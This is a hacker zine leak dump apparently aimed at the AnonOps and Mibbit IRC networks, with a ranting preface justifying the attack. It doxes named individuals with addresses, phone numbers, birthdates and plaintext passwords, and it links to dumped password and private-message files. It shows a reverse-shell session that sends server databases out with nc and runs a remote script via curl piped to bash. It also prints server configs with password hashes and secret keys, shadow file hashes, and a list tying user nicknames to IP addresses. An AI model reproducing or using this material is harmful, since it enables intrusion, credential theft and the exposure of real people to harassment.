Oper: hercule:0b2ac71dc51f
Email: jwind () gmx de
Joshua
Name: Joshua Luckers
Age: 23
DOB: 06/15/1988
NickServ: Joshua:TwEaKeRs
Oper: joshua:ec31e1a98607
Email: joshua () sensiva net
Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
http://joshualuckers.nl/
Kitsune
Name: Todd Parker
Email: kitsune () sbcglobal net
NickServ: Kitsune:undquiet
Oper: kitsune:$5T`mIb5705
http://nenolod.net/~nenolod/mibbit-debacle.html
Molkmin
Name: Thomas W Lyon
Age: 58
DOB: 06/04/1953
Address: 2188 US Highway 10 Sears, MI 49679-8073
NickServ: molkmin:sotw1btn
Oper: molkmin:ghotisotwbtn
Email: tlyon () netonecom net
Email2: fxrocker () gmail com
Phone: 231-734-6144
http://www.netonecom.net
http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
Pottsi
Name: Ian Potts
Age: 24
Location: Manchester, UK
NickServ: pottsi:digger
Email: pottsi () pottsi com
Email2: ian1potts () aol com
Email3: iantom90 () hotmail co uk
http://pottsi.com/
http://www.myspace.com/56242380
Sindacious
Name: James Clifton Newton
Age: 19
DOB: 05/06/1992
Address: 1506 Jenks Ave Panama City, FL 32405
Oper: sindacious:284adflgy343
Phone: 785-746-0322, 850-215-2518
Email: admin () SinIRC net
http://sindacio.us/
http://www.sindacious.com (It just redirects to sindacio.us)
http://twitter.com/sindacious
:: 0x07 - exit ::
K1LL Th3 G1b50n!
attachm3nts >>>
n3t0nec0m shad0ws
m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
w1k1 pass3s
m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
n1cks3rv pass3s
m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
pMs
m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
cHaN msGs
http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
root () tools:~# wall <<< "E0F"
Broadcast Message from root () tools
(/dev/pts/3) at [redacted] ...
E0F

816
htp/HTP-3.txt
View file

@ -1,816 +0,0 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
8888888888 888 ,-:` \;',`'-
888 888 .'-;_,; ':-;_,'.
888 888 /; '/ , _`.-\
8888888 888 | '`. (` /` ` \`|
888 888 |:. `\`-. \_ / |
888 888 | ( `, .`\ ;'|
888 888 \ | .' `-'/
8888888888 88888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888 d8888
888 Y88b 888 d88888 8888b 888 888 888 d88888
888 888 888 d88P888 88888b 888 888 888 d88P888
888 d88P 888 d88P 888 888Y88b 888 8888888 888 d88P 888
8888888P" 888 d88P 888 888 Y88b888 888 888 d88P 888
888 888 d88P 888 888 Y88888 888 888 d88P 888
888 888 d8888888888 888 Y8888 888 888 d8888888888
888 88888888 d88P 888 888 Y888 8888888888 888 d88P 888
<shitstorm> lol who the fuck is carlos
CARLOS1337
PRESENTE
LOL ANONOPS MUERTO
CERO DIA EDICION
┌─────────────────────────┐
│ :: Table of Contents :: │
├─────────────────────────┤
│ 0x01 ~ Prefac3 │
├─────────────────────────┤
│ 0x02 ~ s3rv1c3s pwn │
├─────────────────────────┤
│ 0x03 ~ iRCd pwn │
├─────────────────────────┤
│ 0x04 ~ b0x pwn │
├─────────────────────────┤
│ 0x05 ~ 1ps │
├─────────────────────────┤
│ 0x06 ~ l0l sh1t │
├─────────────────────────┤
│ 0x07 ~ FiL3z │
├─────────────────────────┤
│ 0x08 ~ ex1t │
└─────────────────────────┘
:: 0x01 - Prefac3 ::
Over the course of the following months, it has become very clear to us that
AnonOps no longer stands for the values of open speech, freedom of opinion and
has instead transformed itself into a network rampent with trolls, abusive
channel operators, and a generally unwelcoming place for those whom wish to
communicate and gather to fight the powers of corruption, and those whom wish
to censor our open internet. Various attempts have been made in the past to
course correct AnonOps, but the totalitarian IRC operator regime has remained
intact.
The AnonOps network prides itself in being "secure", however, such is not
the case. Rather, they employ incompetent and highly unprofessional channel and
IRC operators, allowing their personal grudges to interfere with the operation
of a secure network for Anonymous. Newcomers to the network are welcomed by a
spirit of condescention and arrogance, as any legitimate question or concern is
slowly drowned out by the laughter of the senior members of the chatroom.
Channel operators rather than discourage such behavior, applaud it, joining in,
and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
to speak out against the way the network is ran is met with kick, ban, or zline.
A decentralized organization such as Anonymous cannot thrive on a network ran by
such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
an idea; ideas are bulletproof.
Anonymous cannot be owned or controlled by a small group of faggot
totaltarian operators. Thus we have decided to lombotomize the cancer that is
AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
against us as an agent of censorship, unlulzy pseudo-activism and immense
faggotry, and thus must be eliminated.
AnonOps has proven itself insecure and fault prone in the past. We are here
to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
actions, they have proven themselves against our ideals. Welcome to thecourt of
the internet, AnonOps. You shall be persecuted for your crimes against the
freedom of chats, your utter and repeated failure as an IRC network, your aid to
the spread of namefagging, and your gross negligence in securing the identities
of those whom chat and remain Anonymous on your network.
AnonOps has shown time and time again it is too large of a target, and very
well capable of corrupting the ideals which fuels the fight in every Anon.
As long as AnonOps stay online, they will continue to adulterate our cause,
bastardizing ideals of Anonymous, and running a network where the only lulz to
be had are that of the failures whom chat there and run the network. Such
activity cannot continue.
Let's drop the formalities now, and get down to business!
:: 0x02 - s3rv1c3s pwn ::
¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
After probing AnonOps for quite a while, we figured out that they were using
a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
zero day we were able to get ourselves a reverse shell.
connect to [REDACTED] from 46.182.105.86 38604
[anonops@ns1 ~]$ id
uid=502(anonops) gid=502(anonops) groups=502(anonops)
# Let's go ahead and snag ourselves some juicy files...
[anonops@ns1 ~]$ cd ~/inspircd/run/conf
[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
[anonops@ns1 conf]$ cd ~/services
[anonops@ns1 services]$ nc htp 443 < nick.db
[anonops@ns1 services]$ nc htp 443 < chan.db
[anonops@ns1 services]$ nc htp 443 < oper.db
[anonops@ns1 services]$ nc htp 443 < os_info.db
# And then let's go ahead and hook services.
[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
[anonops@ns1 services]$ killall services; ./services; exit
:: 0x02 - iRCd pwn ::
¡Dios Mios!
<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
<power hash="sha256"
diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
modes="+xiw">
<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
modes="+xiw">
<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+xwi">
<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
<cidr ipv4clone="32" ipv6clone="128">
<channels users="50" opers="100">
<banlist chan="*" limit="128">
<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
invitebypassmodes="no">
<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
quietbursts="yes" nouserdns="no">
<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
restrictbannedusers="yes" genericoper="yes" userstats="">
<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
<badnick nick="ChanServ" reason="Reserved For Services">
<badnick nick="NickServ" reason="Reserved For Services">
<badnick nick="OperServ" reason="Reserved For Services">
<badnick nick="MemoServ" reason="Reserved For Services">
<badnick nick="BotServ" reason="Reserved For Services">
<badnick nick="vHostServ" reason="Reserved For Services">
<badhost host="IRCLOIC@*" reason="wrong server">
<uline server="services.anonops.in" silent="yes">
<uline server="defender.anonops.in" silent="yes">
# Oper Classes
<class name="Root"
commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
GRELOADMODULE CLEARCACHE">
<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
GLOADMODULE GUNLOADMODULE SQUIT"
privs="users/auspex channels/auspex servers/auspex users/mass-message
channels/high-join-limit channels/set-permanent users/flood/no-throttle
users/flood/increased-buffers" usermodes="*" chanmodes="*">
<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
channels/high-join-limit" usermodes="*" chanmodes="*">
<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
chanmodes="*" privs="users/mass-message">
<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
CHECK CHGNAME" usermodes="*" chanmodes="*">
<class name="OperUnlag" privs="users/flood/no-throttle
users/flood/increased-buffers">
<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
OJOIN FILTER CBAN">
# Oper Types
<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
MODEDEVOICE MODEHALFOP MODEDEHALFOP">
<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
ServerLink Shutdown" vhost="servadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
# Oper List
<oper name="power2all" hash="sha256"
password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="Cody" hash="sha256"
password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pi" hash="sha256"
password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
host="*@*" vhost="anonops.staff" type="RootAdmin">
<oper name="p0ke" hash="sha256"
password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="jaychow" hash="sha256"
password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="shitstorm" hash="sha256"
password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
#<oper name="Isis" hash="sha256"
# password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="Nerdo" hash="sha256"
# password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
# host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="evilworks" hash="sha256"
password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="Jupiler" hash="sha256"
password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="sharpie" hash="sha256"
# password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="daboogieman" hash="sha256"
password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pie" hash="sha256"
password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
# Default Modules Configs
<module name="m_md5.so">
<module name="m_sha256.so">
<module name="m_ripemd160.so">
<module name="m_alias.so">
<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
uline="yes">
<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
uline="yes">
<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
uline="yes" operonly="yes">
<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
uline="yes">
<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
uline="yes">
<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
uline="yes">
<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
operonly="yes">
<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
uline="yes">
<module name="m_allowinvite.so">
<module name="m_alltime.so">
<module name="m_auditorium.so">
<auditorium opvisible="no" opcansee="yes" opercansee="yes">
<module name="m_blockcolor.so">
<module name="m_botmode.so">
<module name="m_callerid.so">
<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
<module name="m_chancreate.so">
<module name="m_chanprotect.so">
<chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
deprotectothers="yes">
<module name="m_check.so">
<module name="m_chghost.so">
<module name="m_chgident.so">
<module name="m_chgname.so">
<module name="m_cloaking.so">
<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
<module name="m_close.so">
<module name="m_clones.so">
<module name="m_conn_umodes.so">
#<module name="m_connectban.so">
#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
<module name="m_dccallow.so">
<dccallow blockchat="yes" length="0" action="block">
<banfile pattern="*" action="block">
<module name="m_delayjoin.so">
<module name="m_devoice.so">
<module name="m_dnsbl.so">
<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
reason="DroneBL" duration="30d" bitmask="253">
<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
reason="ProxyBL" duration="30d" bitmask="253">
<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
reason="EFnetRBL" duration="30d" bitmask="253">
<module name="m_filter.so">
<filteropts engine="pcre">
<module name="m_globalload.so">
<module name="m_globops.so">
<module name="m_halfop.so">
<module name="m_hidechans.so">
<hidechans affectsopers="false">
<module name="m_hideoper.so">
<module name="m_inviteexception.so">
<module name="m_joinflood.so">
<module name="m_knock.so">
<module name="m_lockserv.so">
<module name="m_maphide.so">
<module name="m_messageflood.so">
<module name="m_muteban.so">
<module name="m_conn_waitpong.so">
<waitpong sendsnotice="yes" killonbadreply="no">
<module name="m_nickflood.so">
<module name="m_nicklock.so">
<module name="m_nonotice.so">
<module name="m_noctcp.so">
<module name="m_nokicks.so">
<module name="m_nonicks.so">
#Oper modules
<module name="m_operchans.so">
<module name="m_ojoin.so">
<ojoin prefix="" notice="no" op="no">
<module name="m_operjoin.so">
<operjoin channel="#opers" override="no">
<module name="m_opermotd.so">
<opermotd file="oper.motd" onoper="yes">
<module name="m_override.so">
<module name="m_password_hash.so">
<module name="m_redirect.so">
<module name="m_regex_glob.so">
<module name="m_regex_posix.so">
<module name="m_regex_pcre.so">
<module name="m_regonlycreate.so">
<module name="m_rline.so">
<module name="m_sajoin.so">
<module name="m_sakick.so">
<module name="m_samode.so">
<module name="m_sanick.so">
<module name="m_sapart.so">
<module name="m_satopic.so">
<module name="m_securelist.so">
<securehost exception="*@*.searchirc.org">
<securehost exception="*@*.netsplit.de">
<securehost exception="*@bot.search.mibbit.com">
<module name="m_sethost.so">
<module name="m_setident.so">
<module name="m_setname.so">
<module name="m_seenicks.so">
<module name="m_services_account.so">
<module name="m_showwhois.so">
<module name="m_shun.so">
<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
<module name="m_spanningtree.so">
<module name="m_sslmodes.so">
<module name="m_ssl_gnutls.so">
<module name="m_sslinfo.so">
<module name="m_stripcolor.so">
<module name="m_svshold.so">
<module name="m_swhois.so">
<module name="m_timedbans.so">
<module name="m_tline.so">
#<module name="m_xline_db.so">
#Mibbit Blocks
<module name="m_cgiirc.so">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="64.62.228.82">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="207.192.75.252">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="78.129.202.38">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="109.169.29.95">
# P0ke's WebIRC
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
:: 0x04 - b0x pwn ::
[anonops@ns1 run]$ base64 utmp
[anonops@ns1 etc]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
shitstorm:x:500:500::/home/shitstorm:/bin/bash
anonops:x:501:501::/home/anonops:/bin/bash
owen:x:502:502::/home/owen:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
# IT GETS BETTER!
[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
:: 0x05 ~ 1pS ::
# These were posted on pastebin, but it didnt seem to get as much attention
# as whoever posted it wanted it to get. All these are from a vulnerable
# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
# What a fucking idiot.
ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
